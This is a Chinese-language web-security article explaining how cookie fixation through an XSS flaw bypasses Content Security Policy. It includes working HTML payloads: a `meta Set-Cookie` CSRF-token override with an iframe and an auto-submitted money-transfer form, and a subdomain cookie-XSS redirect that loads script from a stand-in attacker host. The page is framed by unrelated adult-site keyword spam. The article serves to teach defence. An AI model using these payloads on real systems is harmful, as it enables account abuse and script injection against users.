成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

CSP flaws: cookie fixation

安全 漏洞 應用安全
今天我們來考察一些與Cookie篡改漏洞有關的例子。

[[182419]]

前言

我們知道,CSP不會阻止 這樣的標簽。因此,對于含有XSS漏洞的頁面來說,即使提供了CSP保護,攻擊者仍然可以通過寫入Cookie來發動攻擊。 下面,我們來考察一些與Cookie篡改漏洞有關的例子。

雙重提交Cookie示例

雙重提交cookie是一些應用程序和框架用于處理CSRF的技術。這意味著所有表單都必須包含一個在cookie中設置的令牌。 如果在表單中發送的令牌與cookie中的令牌不同,則請求被丟棄。 這種技術被OWASP推薦為基于會話的令牌的替代方案。

在偽代碼中它可能看起來像這樣:

  1. //User sent the form 
  2. if(isset($_POST['submit'])){ 
  3.          if($_POST['token'] == $_COOKIE['token']){ 
  4.                   //Accept the form 
  5.          }else{ 
  6.                   echo "CSRF ATTACK DETECTED"; 
  7.                   exit(); 
  8.          } 

沒有CSP的時候,如果應用程序含有XSS漏洞,那么攻擊者就可以使用腳本來填寫并提交他們想要攻擊的任何表單:

  1. <script> 
  2. document.getElementById('sendmoneyto').value = 'Mathias'
  3. document.getElementById('form').submit(); 
  4. </script> 

使用CSP后,我們就可以(通過使用隨機數或限制內聯腳本)避免這種情況了。然而,攻擊者可以使用以下payload來實現同樣的事情:

  1. <meta http-equiv="Set-Cookie" content="token=NotSoSecretAnyMore"> 

然后,在攻擊者的網站上:

  1. <script> 
  2. function submitForm(){ 
  3.   document.forms[0].submit(); 
  4. </script> 
  5. <iframe src='http://targetapplication/vulnerabletoxss?parameter=<meta http-equiv="Set-Cookie" content="token=NotSoSecretAnyMore">' onload="submitForm()"></iframe> 
  6. <form action="http://targetapplication/targetform" method="POST"> 
  7. <input type="hidden" name="token" value="NotSoSecretAnyMore" /> 
  8. <input type="hidden" name="sendmoneyto" value="Mathias" /> 
  9. </form> 

 

 

 

 

因為攻擊者能夠改寫令牌,所以他們可以在其頁面上的表單中使用新令牌,從而繞過CSRF保護措施。

雙會話示例

現實中,使用多個會話Cookie的應用程序是非常少見的。例如,主應用程序使用一個會話Cookie,而“次應用程序”使用另一個會話Cookie。

如果攻擊者可以篡改cookie,他們就可以讓受害者在主應用程序中使用攻擊者的會話cookie。這樣的話,就可以讓受害者在主應用程序中以攻擊者身份登錄,而在次應用程序中以受害者身份登錄。

如果應用程序從主應用程序提取送貨數據,那么受害人在次應用程序中購買的產品就會被發往攻擊者的地址。

子域cookie XSS示例

如果子域中存在cookie XSS漏洞,攻擊者可以使用cookie篡改漏洞來設置XSS cookie,然后重定向到易受攻擊的頁面:

  1. <meta http-equiv="Set-Cookie" content="vulnerableCookie=<script src=//attackers/page.js>"> 
  2. <meta http-equiv="refresh" content="0;URL=http://othersubdomain.vulnerable/page_vulnerable_to_cookie_xss"> 

 

結論

雖然許多客戶端漏洞都可以通過CSP進行緩解,但是Cookie篡改仍然會導致一些安全問題,因為它對于這種漏洞根本不起作用。當開發使用CSP和cookie的應用程序時,一定要注意各種類型攻擊的不同之處。

責任編輯:趙寧寧 來源: 安全客
相關推薦

2013-08-21 09:21:01

2013-08-21 10:08:16

2016-09-13 21:30:11

JavascriptCSPWeb

2020-04-29 15:30:22

CSP網頁前端

2014-04-21 10:24:06

2013-05-15 15:05:53

2012-11-19 10:02:01

cookie poiscookie防篡改cookie

2012-11-14 17:18:58

2009-07-24 17:04:57

ASP.NET中Coo

2024-07-30 14:31:01

2021-01-28 18:06:49

JavaScriptCookieWeb

2021-02-09 00:45:51

GoogleCookie隱私

2013-11-08 11:15:54

2010-09-07 14:27:04

Cookie

2015-03-25 09:36:27

CSP五鉆認證華為

2024-12-18 14:06:56

2021-11-15 05:31:37

云廠商CSP網絡

2025-06-03 02:00:00

2016-10-10 13:51:42

2013-03-19 09:23:08

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久久y| 久久免费精品视频 | 久久88| 国产中文字幕在线观看 | 精品久久电影 | 狠狠色综合网站久久久久久久 | 欧美在线观看黄色 | 日韩视频在线免费观看 | 久久久久久久久久久91 | 欧美精品二区 | 美国十次成人欧美色导视频 | 97caoporn国产免费人人 | 久久久久一区二区三区四区 | 久久欧美高清二区三区 | 久久国产精品一区二区三区 | 91精品国产乱码久久久久久久 | 久久99精品久久久久久狂牛 | 国内精品一区二区 | 91精品国产综合久久久久久首页 | 亚洲激情网站 | 2022精品国偷自产免费观看 | 欧美黄色片 | 欧美日韩亚洲国产 | 久久久国产视频 | 久久里面有精品 | 久久99久久| 欧美综合一区 | 青青久草 | 中文字幕一区二区三区四区五区 | 欧美综合在线观看 | 国产高清久久 | 黄网站免费观看 | 免费成年网站 | 精品一区二区三区中文字幕 | 福利影院在线看 | 毛片视频网站 | 久久精品亚洲国产奇米99 | 黄色毛片网站在线观看 | 草草视频在线免费观看 | 99re在线视频观看 | 精品二三区 |